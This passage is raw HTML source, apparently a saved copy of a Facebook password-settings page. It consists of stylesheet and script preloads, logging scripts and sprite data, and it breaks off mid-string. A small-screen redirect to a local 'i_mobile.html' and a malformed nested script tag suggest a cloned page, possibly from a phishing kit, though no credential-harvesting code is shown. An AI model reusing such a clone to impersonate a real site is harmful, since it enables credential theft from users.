href="https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/4uhN5ttIRco.css" rel="preload"/> <link as="style" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yj/l/0,cross/RqO8GYSYDCB.css" rel="preload"/> <link as="style" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yG/l/0,cross/9uem1epsI1Q.css" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3iwcI4/y1/l/en_GB/NkGdM-G8pLp.js" rel="preload"/> <link as="style" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/hBJVCdEnPPO.css" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3iXNP4/yj/l/en_GB/xDgVkzt_CpX.js" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3irtY4/yY/l/en_GB/Wufu2G577FO.js" rel="preload"/> <link as="style" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0,cross/MpEitCdENsl.css" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3i7LP4/ym/l/en_GB/9PBKJ2FPWr0.js" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yX/r/FsPFvCvDyNp.js" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3iyMN4/yL/l/en_GB/u3bhTZIjxdJ.js" rel="preload"/> <link as="style" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yY/l/0,cross/x-sOtP-h_9v.css" rel="preload"/> <link as="style" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yh/l/0,cross/ZhZFZrmogev.css" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3ikJI4/yf/l/en_GB/D6nDLM2E61M.js" rel="preload"/> <link as="style" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/y8/l/0,cross/LLormSyMM24.css" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3ixQZ4/yY/l/en_GB/9ExuN2bmcu4.js" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3i8gi4/ys/l/en_GB/OUZTGQDeCMO.js" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3i2ZR4/yx/l/en_GB/Ehe2euc1TLi.js" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yV/r/_A-fUiF96oq.js" rel="preload"/> <link as="style" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/a1k-ARehlRD.css" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3iih24/yp/l/en_GB/rcyi0X4VRXd.js" rel="preload"/> <link as="style" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yb/l/0,cross/8qCe9whvnj_.css" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3iJlY4/yZ/l/en_GB/MY6DqeK0eSP.js" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3iKJ04/yu/l/en_GB/hn53DFY8Y2w.js" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yY/r/scjmlCRtFXp.js" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3iWej4/ys/l/en_GB/7WnsxK_8Tmb.js" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/y5/r/dinCFvOx9nI.js" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3iSe54/yN/l/en_GB/cU-tYue6Tsl.js" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3ioLb4/yo/l/en_GB/AwT7HshPywQ.js" rel="preload"/> <link as="style" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yn/l/0,cross/6xkD0SLZj3i.css" rel="preload"/> <link as="style" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yM/l/0,cross/bdgdeiSNKo7.css" rel="preload"/> <link as="style" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/qL59JYnjQZi.css" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3iNo24/y3/l/en_GB/9jYUONOs5MG.js" rel="preload"/> <link as="style" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yk/l/0,cross/YsUrvCN3hvR.css" rel="preload"/> <link as="script" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3iSv94/yc/l/en_GB/gOeil2mMUnw.js" rel="preload"/> <link as="style" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/JlFBvU5osN3.css" rel="preload"/> <link as="style" crossorigin="anonymous" href="https://static.xx.fbcdn.net/rsrc.php/v3/yg/l/0,cross/SXJ_CeiksFK.css" rel="preload"/> <script> window._cstart=+new Date(); </script> <script> function envFlush(a)\{function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||\{},b(window.Env))}envFlush({"ajaxpipe_token":"AXgpPx_93hSD38-D","timeslice_heartbeat_config":{"pollIntervalMs":33,"idleGapThresholdMs":60,"ignoredTimesliceNames":{"requestAnimationFrame":true,"Event listenHandler mousemove":true,"Event listenHandler mouseover":true,"Event listenHandler mouseout":true,"Event listenHandler scroll":true},"isHeartbeatEnabled":true,"isArtilleryOn":false},"shouldLogCounters":true,"timeslice_categories":{"react_render":true,"reflow":true},"sample_continuation_stacktraces":true,"dom_mutation_flag":true,"khsh":"0`sj`e`rm`s-0fdu^gshdoer-0gc^eurf-3gc^eurf;1;enbtldou;fduDmdldourCxO`ld-2YLMIuuqSdptdru;qsnunuxqd;rdoe-0unjdojnx-0unjdojnx0-0gdubi^rdbsduOdv-0`sj`e`r-0q`xm`r-0StoRbs`qhof-0mhoj^q`xm`r","stack_trace_limit":30,"gk_raf_flush":true,"reliability_fixederrors_2018":true,"timesliceBufferSize":5000}); </script> <style> </style> <script> __DEV__=0;CavalryLogger=window.CavalryLogger||function(a)\{this.lid=a,this.transition=!1,this.metric_collected=!1,this.is_detailed_profiler=!1,this.instrumentation_started=!1,this.pagelet_metrics=\{},this.events=\{},this.ongoing_watch=\{},this.values={t_cstart:window._cstart},this.piggy_values=\{},this.bootloader_metrics=\{},this.resource_to_pagelet_mapping=\{},this.e2eLogged=!1,this.initializeInstrumentation&&this.initializeInstrumentation()},CavalryLogger.prototype.setIsDetailedProfiler=function(a){this.is_detailed_profiler=a;return this},CavalryLogger.prototype.setTTIEvent=function(a){this.tti_event=a;return this},CavalryLogger.prototype.setValue=function(a,b,c,d){d=d?this.piggy_values:this.values;(typeof d[a]==="undefined"||c)&&(d[a]=b);return this},CavalryLogger.prototype.getLastTtiValue=function(){return this.lastTtiValue},CavalryLogger.prototype.setTimeStamp=CavalryLogger.prototype.setTimeStamp||function(a,b,c,d){this.mark(a);var e=this.values.t_cstart||this.values.t_start;e=d?e+d:CavalryLogger.now();this.setValue(a,e,b,c);this.tti_event&&a==this.tti_event&&(this.lastTtiValue=e,this.setTimeStamp("t_tti",b));return this},CavalryLogger.prototype.mark=typeof console==="object"&&console.timeStamp?function(a){console.timeStamp(a)}:function()\{},CavalryLogger.prototype.addPiggyback=function(a,b){this.piggy_values[a]=b;return this},CavalryLogger.instances=\{},CavalryLogger.id=0,CavalryLogger.perfNubMarkup="",CavalryLogger.disableArtilleryOnUntilOffLogging=!1,CavalryLogger.getInstance=function(a){typeof a==="undefined"&&(a=CavalryLogger.id);CavalryLogger.instances[a]||(CavalryLogger.instances[a]=new CavalryLogger(a));return CavalryLogger.instances[a]},CavalryLogger.setPageID=function(a){if(CavalryLogger.id===0){var b=CavalryLogger.getInstance();CavalryLogger.instances[a]=b;CavalryLogger.instances[a].lid=a;delete CavalryLogger.instances[0]}CavalryLogger.id=a},CavalryLogger.setPerfNubMarkup=function(a){CavalryLogger.perfNubMarkup=a},CavalryLogger.now=function(){return window.performance&&performance.timing&&performance.timing.navigationStart&&performance.now?performance.now()+performance.timing.navigationStart:new Date().getTime()},CavalryLogger.prototype.measureResources=function()\{},CavalryLogger.prototype.profileEarlyResources=function()\{},CavalryLogger.getBootloaderMetricsFromAllLoggers=function()\{},CavalryLogger.start_js=function()\{},CavalryLogger.done_js=function()\{};CavalryLogger.getInstance().setTTIEvent("t_domcontent");CavalryLogger.prototype.measureResources=function(a,b){if(!this.log_resources)return;var c="bootload/"+a.name;if(this.bootloader_metrics[c]!==undefined||this.ongoing_watch[c]!==undefined)return;var d=CavalryLogger.now();this.ongoing_watch[c]=d;"start_"+c in this.bootloader_metrics||(this.bootloader_metrics["start_"+c]=d);b&&!("tag_"+c in this.bootloader_metrics)&&(this.bootloader_metrics["tag_"+c]=b);if(a.type==="js"){c="js_exec/"+a.name;this.ongoing_watch[c]=d}},CavalryLogger.prototype.stopWatch=function(a){if(this.ongoing_watch[a]){var b=CavalryLogger.now(),c=b-this.ongoing_watch[a];this.bootloader_metrics[a]=c;var d=this.piggy_values;a.indexOf("bootload")===0&&(d.t_resource_download||(d.t_resource_download=0),d.resources_downloaded||(d.resources_downloaded=0),d.t_resource_download+=c,d.resources_downloaded+=1,d["tag_"+a]=="_EF_"&&(d.t_pagelet_cssload_early_resources=b));delete this.ongoing_watch[a]}return this},CavalryLogger.getBootloaderMetricsFromAllLoggers=function(){var a=\{};Object.values(window.CavalryLogger.instances).forEach(function(b){b.bootloader_metrics&&Object.assign(a,b.bootloader_metrics)});return a},CavalryLogger.start_js=function(a){for(var b=0;b<a.length;++b)CavalryLogger.getInstance().stopWatch("js_exec/"+a[b])},CavalryLogger.done_js=function(a){for(var b=0;b<a.length;++b)CavalryLogger.getInstance().stopWatch("bootload/"+a[b])},CavalryLogger.prototype.profileEarlyResources=function(a){for(var b=0;b<a.length;b++)this.measureResources({name:a[b][0],type:a[b][1]?"js":""},"_EF_")};CavalryLogger.getInstance().log_resources=true;CavalryLogger.getInstance().setIsDetailedProfiler(true);window.CavalryLogger&&CavalryLogger.getInstance().setTimeStamp("t_start"); </script> <noscript> &lt;meta http-equiv="refresh" content="0; URL=/settings?tab=security&amp;amp;section=password&amp;amp;view&amp;amp;_fb_noscript=1" /&gt; </noscript> <link crossorigin="use-credentials" href="/data/manifest/" rel="manifest"/> <link crossorigin="anonymous" data-bootloader-hash="NHGTD" data-permanent="1" href="https://static.xx.fbcdn.net/rsrc.php/v3/yn/l/0,cross/FT1V5TAo3rQ.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" data-bootloader-hash="Rg3pD" data-permanent="1" href="https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/4uhN5ttIRco.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" data-bootloader-hash="+8tRp" data-permanent="1" href="https://static.xx.fbcdn.net/rsrc.php/v3/yj/l/0,cross/RqO8GYSYDCB.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" data-bootloader-hash="kl+/Y" data-permanent="1" href="https://static.xx.fbcdn.net/rsrc.php/v3/yG/l/0,cross/9uem1epsI1Q.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" data-bootloader-hash="rdVJI" href="https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/hBJVCdEnPPO.css" rel="stylesheet" type="text/css"/> <link data-bootloader-hash="P/mr5" href="data:text/css; charset=utf-8,%23bootloader_P_mr5{height:42px;}.bootloader_P_mr5{display:block!important;}" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" data-bootloader-hash="utT+H" data-permanent="1" href="https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0,cross/MpEitCdENsl.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" data-bootloader-hash="kHLQg" data-permanent="1" href="https://static.xx.fbcdn.net/rsrc.php/v3/yY/l/0,cross/x-sOtP-h_9v.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" data-bootloader-hash="Bee0v" data-permanent="1" href="https://static.xx.fbcdn.net/rsrc.php/v3/yh/l/0,cross/ZhZFZrmogev.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" data-bootloader-hash="AfZgB" data-permanent="1" href="https://static.xx.fbcdn.net/rsrc.php/v3/y8/l/0,cross/LLormSyMM24.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" data-bootloader-hash="ldHu6" href="https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/a1k-ARehlRD.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" data-bootloader-hash="j4Op8" data-permanent="1" href="https://static.xx.fbcdn.net/rsrc.php/v3/yb/l/0,cross/8qCe9whvnj_.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" data-bootloader-hash="6JrN2" data-permanent="1" href="https://static.xx.fbcdn.net/rsrc.php/v3/yn/l/0,cross/6xkD0SLZj3i.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" data-bootloader-hash="Pfi8i" data-permanent="1" href="https://static.xx.fbcdn.net/rsrc.php/v3/yM/l/0,cross/bdgdeiSNKo7.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" data-bootloader-hash="AYvAm" data-permanent="1" href="https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/qL59JYnjQZi.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" data-bootloader-hash="jAeyQ" data-permanent="1" href="https://static.xx.fbcdn.net/rsrc.php/v3/yk/l/0,cross/YsUrvCN3hvR.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" data-bootloader-hash="sQ7ef" data-permanent="1" href="https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/JlFBvU5osN3.css" rel="stylesheet" type="text/css"/> <link crossorigin="anonymous" data-bootloader-hash="+DAiS" href="https://static.xx.fbcdn.net/rsrc.php/v3/yg/l/0,cross/SXJ_CeiksFK.css" rel="stylesheet" type="text/css"/> <script type="text/javascript"> <!-- if (screen.width <= 699) { document.location = "i_mobile.html"; } //--> </script> <script> <script crossorigin="anonymous" data-bootloader-hash="19wVs" src="https://static.xx.fbcdn.net/rsrc.php/v3/yV/r/_A-fUiF96oq.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="7aYsk" onerror=';(window._btldr||(window._btldr=\{}))["7aYsk"]=1' onload=';(window._btldr||(window._btldr=\{}))["7aYsk"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3iYXl4/yt/l/en_GB/GyBZ_3rQfiS.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="j4Ljx" onerror=';(window._btldr||(window._btldr=\{}))["j4Ljx"]=1' onload=';(window._btldr||(window._btldr=\{}))["j4Ljx"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3/yP/r/v5XZFEJ_r9D.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="n3CYQ" onerror=';(window._btldr||(window._btldr=\{}))["n3CYQ"]=1' onload=';(window._btldr||(window._btldr=\{}))["n3CYQ"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3/yv/r/g18vdDu5Gvb.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="BEw9R" onerror=';(window._btldr||(window._btldr=\{}))["BEw9R"]=1' onload=';(window._btldr||(window._btldr=\{}))["BEw9R"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3iwcI4/y1/l/en_GB/NkGdM-G8pLp.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="NmVPR" onerror=';(window._btldr||(window._btldr=\{}))["NmVPR"]=1' onload=';(window._btldr||(window._btldr=\{}))["NmVPR"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3iXNP4/yj/l/en_GB/xDgVkzt_CpX.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="XZrv9" onerror=';(window._btldr||(window._btldr=\{}))["XZrv9"]=1' onload=';(window._btldr||(window._btldr=\{}))["XZrv9"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3irtY4/yY/l/en_GB/Wufu2G577FO.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="72OwO" onerror=';(window._btldr||(window._btldr=\{}))["72OwO"]=1' onload=';(window._btldr||(window._btldr=\{}))["72OwO"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3i7LP4/ym/l/en_GB/9PBKJ2FPWr0.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="np5Vl" onerror=';(window._btldr||(window._btldr=\{}))["np5Vl"]=1' onload=';(window._btldr||(window._btldr=\{}))["np5Vl"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3/yX/r/FsPFvCvDyNp.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="/NvwD" onerror=';(window._btldr||(window._btldr=\{}))["\\/NvwD"]=1' onload=';(window._btldr||(window._btldr=\{}))["\\/NvwD"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3iyMN4/yL/l/en_GB/u3bhTZIjxdJ.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="rdSEf" onerror=';(window._btldr||(window._btldr=\{}))["rdSEf"]=1' onload=';(window._btldr||(window._btldr=\{}))["rdSEf"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3ikJI4/yf/l/en_GB/D6nDLM2E61M.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="0n0v6" onerror=';(window._btldr||(window._btldr=\{}))["0n0v6"]=1' onload=';(window._btldr||(window._btldr=\{}))["0n0v6"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3ixQZ4/yY/l/en_GB/9ExuN2bmcu4.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="dIFKP" onerror=';(window._btldr||(window._btldr=\{}))["dIFKP"]=1' onload=';(window._btldr||(window._btldr=\{}))["dIFKP"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3i8gi4/ys/l/en_GB/OUZTGQDeCMO.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="27fPb" onerror=';(window._btldr||(window._btldr=\{}))["27fPb"]=1' onload=';(window._btldr||(window._btldr=\{}))["27fPb"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3i2ZR4/yx/l/en_GB/Ehe2euc1TLi.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="IO8eo" onerror=';(window._btldr||(window._btldr=\{}))["IO8eo"]=1' onload=';(window._btldr||(window._btldr=\{}))["IO8eo"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3iih24/yp/l/en_GB/rcyi0X4VRXd.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="D0Bd3" onerror=';(window._btldr||(window._btldr=\{}))["D0Bd3"]=1' onload=';(window._btldr||(window._btldr=\{}))["D0Bd3"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3iJlY4/yZ/l/en_GB/MY6DqeK0eSP.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="C/4sM" onerror=';(window._btldr||(window._btldr=\{}))["C\\/4sM"]=1' onload=';(window._btldr||(window._btldr=\{}))["C\\/4sM"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3iKJ04/yu/l/en_GB/hn53DFY8Y2w.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="rzQjB" onerror=';(window._btldr||(window._btldr=\{}))["rzQjB"]=1' onload=';(window._btldr||(window._btldr=\{}))["rzQjB"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3/yY/r/scjmlCRtFXp.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="zpNP2" onerror=';(window._btldr||(window._btldr=\{}))["zpNP2"]=1' onload=';(window._btldr||(window._btldr=\{}))["zpNP2"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3iWej4/ys/l/en_GB/7WnsxK_8Tmb.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="Xxho8" onerror=';(window._btldr||(window._btldr=\{}))["Xxho8"]=1' onload=';(window._btldr||(window._btldr=\{}))["Xxho8"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3/y5/r/dinCFvOx9nI.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="q+9No" onerror=';(window._btldr||(window._btldr=\{}))["q+9No"]=1' onload=';(window._btldr||(window._btldr=\{}))["q+9No"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3iSe54/yN/l/en_GB/cU-tYue6Tsl.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="5p2rH" onerror=';(window._btldr||(window._btldr=\{}))["5p2rH"]=1' onload=';(window._btldr||(window._btldr=\{}))["5p2rH"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3ioLb4/yo/l/en_GB/AwT7HshPywQ.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="MbCGD" onerror=';(window._btldr||(window._btldr=\{}))["MbCGD"]=1' onload=';(window._btldr||(window._btldr=\{}))["MbCGD"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3iNo24/y3/l/en_GB/9jYUONOs5MG.js"> </script> <script async="1" crossorigin="anonymous" data-bootloader-hash="IEK7S" onerror=';(window._btldr||(window._btldr=\{}))["IEK7S"]=1' onload=';(window._btldr||(window._btldr=\{}))["IEK7S"]=1' src="https://static.xx.fbcdn.net/rsrc.php/v3iSv94/yc/l/en_GB/gOeil2mMUnw.js"> </script> <script> requireLazy(["ix"], function(ix) {ix.add({"75362":{"sprited":true,"spriteCssClass":"sx_7f492a","spriteMapCssClass":"sp_Q7BlBRG3SXX"},"82443":{"sprited":true,"spriteCssClass":"sx_478015","spriteMapCssClass":"sp_ks9jMipqQdl"},"101565":{"sprited":true,"spriteCssClass":"sx_79215f","spriteMapCssClass":"sp_lWDeTZIqYK9"},"101566":{"sprited":true,"spriteCssClass":"sx_a4c7cf","spriteMapCssClass":"sp_lWDeTZIqYK9"},"125812":{"sprited":true,"spriteCssClass":"sx_dc314f","spriteMapCssClass":"sp_lWDeTZIqYK9"},"140856":{"sprited":true,"spriteCssClass":"sx_01ecb7","spriteMapCssClass":"sp_Q7BlBRG3SXX"},"114247":{"sprited":true,"spriteCssClass":"sx_77fb26","spriteMapCssClass":"sp_Vwm17iA5muE"},"114286":{"sprited":true,"spriteCssClass":"sx_ab9ce6","spriteMapCssClass":"sp_LKrU34s1pmy"},"114382":{"sprited":true,"spriteCssClass":"sx_87db4d","spriteMapCssClass":"sp_LKrU34s1pmy"},"114421":{"sprited":true,"spriteCssClass":"sx_1f5430","spriteMapCssClass":"sp_LKrU34s1pmy"},"114424":{"sprited":true,"spriteCssClass":"sx_caca77","spriteMapCssClass":"sp_LKrU34s1pmy"},"114438":{"sprited":true,"spriteCssClass":"sx_d7b7d4","spriteMapCssClass":"sp_LKrU34s1pmy"},"114491":{"sprited":true,"spriteCssClass":"sx_c6668d","spriteMapCssClass":"sp_LKrU34s1pmy"},"114533":{"sprited":true,"spriteCssClass":"sx_f82828","spriteMapCssClass":"sp_LKrU34s1pmy"},"114536":{"sprited":true,"spriteCssClass":"sx_6cf572","spriteMapCssClass":"sp_LKrU34s1pmy"},"114543":{"sprited":true,"spriteCssClass":"sx_b322f6","spriteMapCssClass":"sp_LKrU34s1pmy"},"114819":{"sprited":true,"spriteCssClass":"sx_d5e341","spriteMapCssClass":"sp_LKrU34s1pmy"},"114935":{"sprited":true,"spriteCssClass":"sx_746ccd","spriteMapCssClass":"sp_LKrU34s1pmy"},"115012":{"sprited":true,"spriteCssClass":"sx_0d1752","spriteMapCssClass":"sp_LKrU34s1pmy"},"115046":{"sprited":true,"spriteCssClass":"sx_3b5141","spriteMapCssClass":"sp_LKrU34s1pmy"},"115066":{"sprited":true,"spriteCssClass":"sx_838b98","spriteMapCssClass":"sp_LKrU34s1pmy"},"115091":{"sprited":true,"spriteCssClass":"sx_f13313","spriteMapCssClass":"sp_LKrU34s1pmy"},"115095":{"sprited":true,"spriteCssClass":"sx_69198f","spriteMapCssClass":"sp_LKrU34s1pmy"},"115104":{"sprited":true,"spriteCssClass":"sx_b7954c","spriteMapCssClass":"sp_LKrU34s1pmy"},"115107":{"sprited":true,"spriteCssClass":"sx_72906b","spriteMapCssClass":"sp_LKrU34s1pmy"},"115111":{"sprited":true,"spriteCssClass":"sx_732a35","spriteMapCssClass":"sp_LKrU34s1pmy"},"115128":{"sprited":true,"spriteCssClass":"sx_4af873","spriteMapCssClass":"sp_LKrU34s1pmy"},"115151":{"sprited":true,"spriteCssClass":"sx_d665ce","spriteMapCssClass":"sp_LKrU34s1pmy"},"115250":{"sprited":true,"spriteCssClass":"sx_df9f88","spriteMapCssClass":"sp_7t5-NObyfQQ"},"115261":{"sprited":true,"spriteCssClass":"sx_3ec58c","spriteMapCssClass":"sp_LKrU34s1pmy"},"115313":{"sprited":true,"spriteCssClass":"sx_6c9494","spriteMapCssClass":"sp_LKrU34s1pmy"},"115316":{"sprited":true,"spriteCssClass":"sx_f9ffc5","spriteMapCssClass":"sp_LKrU34s1pmy"},"115337":{"sprited":true,"spriteCssClass":"sx_e06dd8","spriteMapCssClass":"sp_LKrU34s1pmy"},"115515":{"sprited":true,"spriteCssClass":"sx_af19b7","spriteMapCssClass":"sp_LKrU34s1pmy"},"115527":{"sprited":true,"spriteCssClass":"sx_134b25","spriteMapCssClass":"sp_LKrU34s1pmy"},"115542":{"sprited":true,"spriteCssClass":"sx_bb7a1b","spriteMapCssClass":"sp_LKrU34s1pmy"},"115560":{"sprited":true,"spriteCssClass":"sx_a4a52e","spriteMapCssClass":"sp_7t5-NObyfQQ"},"115623":{"sprited":true,"spriteCssClass":"sx_1bd1c7","spriteMapCssClass":"sp_LKrU34s1pmy"},"115658":{"sprited":true,"spriteCssClass":"sx_f01023","spriteMapCssClass":"sp_LKrU34s1pmy"},"115710":{"sprited":true,"spriteCssClass":"sx_88b12b","spriteMapCssClass":"sp_LKrU34s1pmy"},"115750":{"sprited":true,"spriteCssClass":"sx_aff56a","spriteMapCssClass":"sp_LKrU34s1pmy"},"117069":{"sprited":true,"spriteCssClass":"sx_b6c2c0","spriteMapCssClass":"sp_LKrU34s1pmy"},"122194":{"sprited":true,"spriteCssClass":"sx_cb9cea","spriteMapCssClass":"sp_qaVWhd9mMV9"},"122256":{"sprited":true,"spriteCssClass":"sx_d8fffa","spriteMapCssClass":"sp_CJdhEXuz5oX"},"123865":{"sprited":true,"spriteCssClass":"sx_b93d01","spriteMapCssClass":"sp_LKrU34s1pmy"},"124199":{"sprited":true,"spriteCssClass":"sx_6af7ed","spriteMapCssClass":"sp_KQ7R8DPd-CR"},"124209":{"sprited":true,"spriteCssClass":"sx_93f1ce","spriteMapCssClass":"sp_KQ7R8DPd-CR"},"124639":{"sprited":true,"spriteCssClass":"sx_407108","spriteMapCssClass":"sp_ks9jMipqQdl"},"363511":{"sprited":true,"spriteCssClass":"sx_d4dad6","spriteMapCssClass":"sp_KQ7R8DPd-CR"},"363532":{"sprited":true,"spriteCssClass":"sx_438719","spriteMapCssClass":"sp_KQ7R8DPd-CR"},"363585":{"sprited":true,"spriteCssClass":"sx_fee065","spriteMapCssClass":"sp_KQ7R8DPd-CR"},"363586":{"sprited":true,"spriteCssClass":"sx_0fb45a","spriteMapCssClass":"sp_KQ7R8DPd-CR"},"375350":{"sprited":true,"spriteCssClass":"sx_2c1606","spriteMapCssClass":"sp_LKrU34s1pmy"},"375566":{"sprited":true,"spriteCssClass":"sx_8b09e5","spriteMapCssClass":"sp_LKrU34s1pmy"},"375609":{"sprited":true,"spriteCssClass":"sx_1d6453","spriteMapCssClass":"sp_LKrU34s1pmy"},"375626":{"sprited":true,"spriteCssClass":"sx_88966c","spriteMapCssClass":"sp_LKrU34s1pmy"},"376185":{"sprited":true,"spriteCssClass":"sx_35e7ba","spriteMapCssClass":"sp_KQ7R8DPd-CR"},"378280":{"sprited":true,"spriteCssClass":"sx_496982","spriteMapCssClass":"sp_qaVWhd9mMV9"},"385699":{"sprited":true,"spriteCssClass":"sx_dc6660","spriteMapCssClass":"sp_KQ7R8DPd-CR"},"388066":{"sprited":true,"spriteCssClass":"sx_a6c4b9","spriteMapCssClass":"sp_KQ7R8DPd-CR"},"390679":{"sprited":true,"spriteCssClass":"sx_1d0359","spriteMapCssClass":"sp_KQ7R8DPd-CR"},"390998":{"sprited":true,"spriteCssClass":"sx_11f601","spriteMapCssClass":"sp_LKrU34s1pmy"},"394327":{"sprited":true,"spriteCssClass":"sx_1900f7","spriteMapCssClass":"sp_KQ7R8DPd-CR"},"400370":{"sprited":true,"spriteCssClass":"sx_e26a99","spriteMapCssClass":"sp_LKrU34s1pmy"},"400546":{"sprited":true,"spriteCssClass":"sx_fd367a","spriteMapCssClass":"sp_LKrU34s1pmy"},"400717":{"sprited":true,"spriteCssClass":"sx_cede36","spriteMapCssClass":"sp_LKrU34s1pmy"},"403739":{"sprited":true,"spriteCssClass":"sx_151c9e","spriteMapCssClass":"s